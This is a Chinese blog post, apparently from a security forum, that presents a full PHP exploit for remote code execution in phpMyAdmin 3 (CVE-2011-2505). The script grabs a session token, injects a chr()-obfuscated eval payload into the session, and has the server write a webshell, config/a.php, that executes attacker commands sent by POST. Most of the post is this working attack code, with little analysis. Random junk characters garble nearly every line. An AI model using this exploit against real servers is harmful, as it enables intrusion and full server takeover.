最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
5 Y0 Q9 R+ ^9 W$ D9 T6 S( z5 }6 F2 H: K! I
6 P( O/ D" {4 l0 U+ \0 b3 ]昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
n2 W1 }( I" z3 }) O4 h' P! s# y+ [" _
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
5 O# I6 M+ R" k2 `# L" H! c一是session.auto_start = 1;( `2 ~, Z) b d4 z
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
! S) B" B, p9 e' K) x# m# X! L9 ~& h当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。4 H3 p- M$ k& E2 E
( Y/ _% P _- D6 T) Z u在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。/ Z5 C- Q: ?3 n* a |
9 O! g+ B' e$ l; [/ [# X1 y# |
于是写了这个php版本的exp,代码如下:
8 h! m: h3 `2 u. g! d4 \& ^. x- h2 T4 H' B+ P0 v3 W- C
#!/usr/bin/php
) S1 y) T. U6 ?$ [+ m( M2 h% q E<?php; k, g6 @1 J# g# m6 h
print_r('9 b* {. D" X- @) e
+---------------------------------------------------------------------------+
( M& u# m0 o- c3 k' hpma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]+ L: C6 F5 p$ t- G6 k
by oldjun(www.oldjun.com)* T4 k: H8 s. c. I
welcome to www.t00ls.net
4 {* [/ Z( G4 Email: oldjun@gmail.com) u# R, l- M, e1 a
Assigned CVE id: CVE-2011-2505
; h( }1 E: g% j6 R+---------------------------------------------------------------------------+4 @4 N0 f: j3 M# L8 s8 K
');
: {1 X& X- s6 B8 X# R# Z
$ I* O4 }' ? L- i/**
1 r" G* k u2 x/ _- h5 g * working when the directory:"config" exists and is writeable.) q' S5 L- g4 _7 s- U8 L
**/
& S! X ]# N/ ]
. r) P' n7 e. T$ p4 C; i/ Pif ($argc < 3) {* c7 B. T) y7 I( K, Z @0 [
print_r('
. O C5 p0 m+ J5 ]4 L+---------------------------------------------------------------------------+
* o1 y$ g' O# `. h2 A9 TUsage: php '.$argv[0].' host path
2 s* d8 a' T- phost: target server (ip/hostname)$ H% v% n( m! j9 l7 D% @3 P
path: path to pma3
S/ ^# d. l6 [- h! f" nExample:; x2 t& g( R6 Z. x
php '.$argv[0].' localhost /pma// ~3 n7 q+ }! [" `
+---------------------------------------------------------------------------+: S$ ^$ F1 q4 d$ p
');: }% e0 {. o# ]
exit;
1 w5 O: K: t5 a3 C; }, }}
+ I( t' K& D( H4 i
+ y5 J4 H7 t2 {( y6 d# F1 ?9 e$host = $argv[1];
4 S& i# p/ ^' }: D$path = $argv[2];
2 v& W$ a6 Z/ z) \! `
8 f1 h( n1 F* s6 j- {/**+ |2 ?1 c% }+ Z$ m x Y. M7 c. K
* Try to determine if the directory:"config" exists3 ~0 s+ L8 P7 M( C$ R+ y l! J
**/
1 V# |5 x7 D* w: h/ _+ n& pecho "[+] Try to determine if the directory:config exists....\n";. l" ]1 F5 z2 \; I* q
$returnstr=php_request('config/');
: `" ^- X0 v4 n; `! bif(strpos($returnstr,'404')){
) s' M/ u- ]/ o exit("[-] Exploit Failed! The directory:config do not exists!\n");
) o1 u9 R4 n% F! w! j, g/ x}8 t2 J7 G6 X2 g
7 b& J) `4 U5 p5 M1 i9 ^$ G
/**- ~0 K0 `- I* Z0 Y0 m2 e+ z; _* \
* Try to get token and sessionid
/ N6 n3 Q: g' _3 J' g% g* z+ L**/
; v$ G v1 X* T7 f' S- N% @echo "[+] Try to get token and sessionid....\n";
8 p$ _. I2 C3 x+ [9 b$ L$result=php_request('index.php');% ?* D; h; g% p# N9 J' V. c, R
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);' F, A; H8 }# x2 i, H! Y% ~" k
$token=$resp[3];8 L8 q9 r. d: k4 s8 k3 c* T' [
$sessionid=$resp[1];. U9 P" h" z6 R( [& V+ ]& }" R' R
if($token && $sessionid){7 G& B- e8 O2 z/ |! N& U9 Y
echo "[+] token token\n";
4 z8 P% u, C5 ~4 D- W echo "[+] Session ID sessionid\n";
: _+ t) o& L @8 M! K$ M}else{1 J+ O) Q, F( d) _/ ^
exit("[-] Can't get token and Session ID,Exploit Failed!\n");- K. L$ G/ I s& }% m' e
}/ I9 P5 r# \% I: }9 @3 R- y
; E- _2 |% E# e' K/**9 d) B# D( j& I1 n, l; `& y7 W4 V
* Try to insert shell into session
' d& A/ Q: ^' R& r$ {**/
6 X6 }: v4 Q2 W- U* [9 |* Mecho "[+] Try to insert shell into session....\n";1 e' d! X* Y0 n4 [3 l0 A, r
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
+ `+ A& p- y9 }4 C8 N% `- L3 Y
- x, N1 n! F3 n W6 V! w% M# u2 R/**
% V* [7 K2 v$ f; m, {9 x1 C * Try to create webshell6 x$ h" m( X! R5 h, p
**/. G1 }# I0 b8 v: _- M
echo "[+] Try to create webshell....\n";! @7 H2 }! j: F9 S6 ?
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
% o0 M0 J, L1 V$ A( F9 P" w' U0 x/**
; U4 U. |+ f; z$ e2 b, C * Try to check if the webshell was created successfully
3 o" J% T1 \( w**/
4 e( B/ F2 T- n' \; K* q; [echo "[+] Try to check if the webshell was created successfully....\n";0 j4 M8 f% E8 n5 A
$content=php_request('config/config.inc.php');3 y( G4 d/ T# q2 Z" A* Z
if(strpos($content,'t00ls')){
L- L2 _4 W) r echo "[+] Congratulations! Expoilt successfully....\n";2 k) v1 S8 [- |6 E1 D
echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";0 U* ]. J0 m% D, @7 ]$ ~
}else{8 z; L4 t4 Y4 {% P# X
exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}5 J8 c7 J0 S- F, P}7 V( [- I9 c1 J1 ~
& g$ n0 J3 G3 |' _# mfunction php_request($url,$data='',$cookie=''){5 u, Z& Z0 o6 o0 k
global $host, $path;5 p W+ k1 ^8 s& T6 O0 G( y
- {$ G5 F" _3 O3 x- [" r: k6 i, m $method=$data?'POST':'GET';5 |5 g+ U5 L5 | O9 \# X2 b
; H5 y' V# r. Z3 R' [. {- f
$packet = $method." ".$path.$url." HTTP/1.1\r\n";
; `+ [' s, ^# [1 m $packet .= "Accept: */*\r\n";
; r8 \& R" p. g ^( J7 j $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";8 e2 d+ ]: `9 X% i
$packet .= "Host: $host\r\n";
* [3 Z& p% K( k, Q4 \ y $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";& ?+ T, @9 @4 x
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
$ p; I7 G7 Y b7 P $packet .= $cookie?"Cookie: $cookie\r\n":"";& b9 d) k& ^( y) R4 O
$packet .= "Connection: Close\r\n\r\n";; Q4 F5 _/ I8 O9 @5 s
$packet .= $data?$data:"";& l. q& s3 |+ T
5 H q0 U x1 G v3 N $fp = fsockopen(gethostbyname($host), 80);
# X4 l* i- F$ W$ z0 I if (!$fp) {- W$ l( p' K/ c9 Y% k/ t
echo 'No response from '.$host; die;% }7 J* a+ I" m
}6 \* c* b, j" l
fputs($fp, $packet);
0 [' O' K# u5 _; \' L: {. f% q3 p$ V8 y0 A9 O1 N- T" L
$resp = '';! J9 x1 [) |% k% k5 a8 T
8 w$ x: V: y: a9 G* W2 { while ($fp && !feof($fp))7 }: F4 a& a5 k$ n/ f: Z) D
$resp .= fread($fp, 1024);
1 i, A3 y+ A4 X5 B3 z2 s/ v
) q! u& V& J4 p" q return $resp;
1 b. v7 v* |8 |* E}9 g+ v5 p+ m# R ^$ ]1 Y
+ q( `5 c6 x, g& F: r/ ]) P
?>
5 S0 ]% {- F7 k/ T/ J! Y. |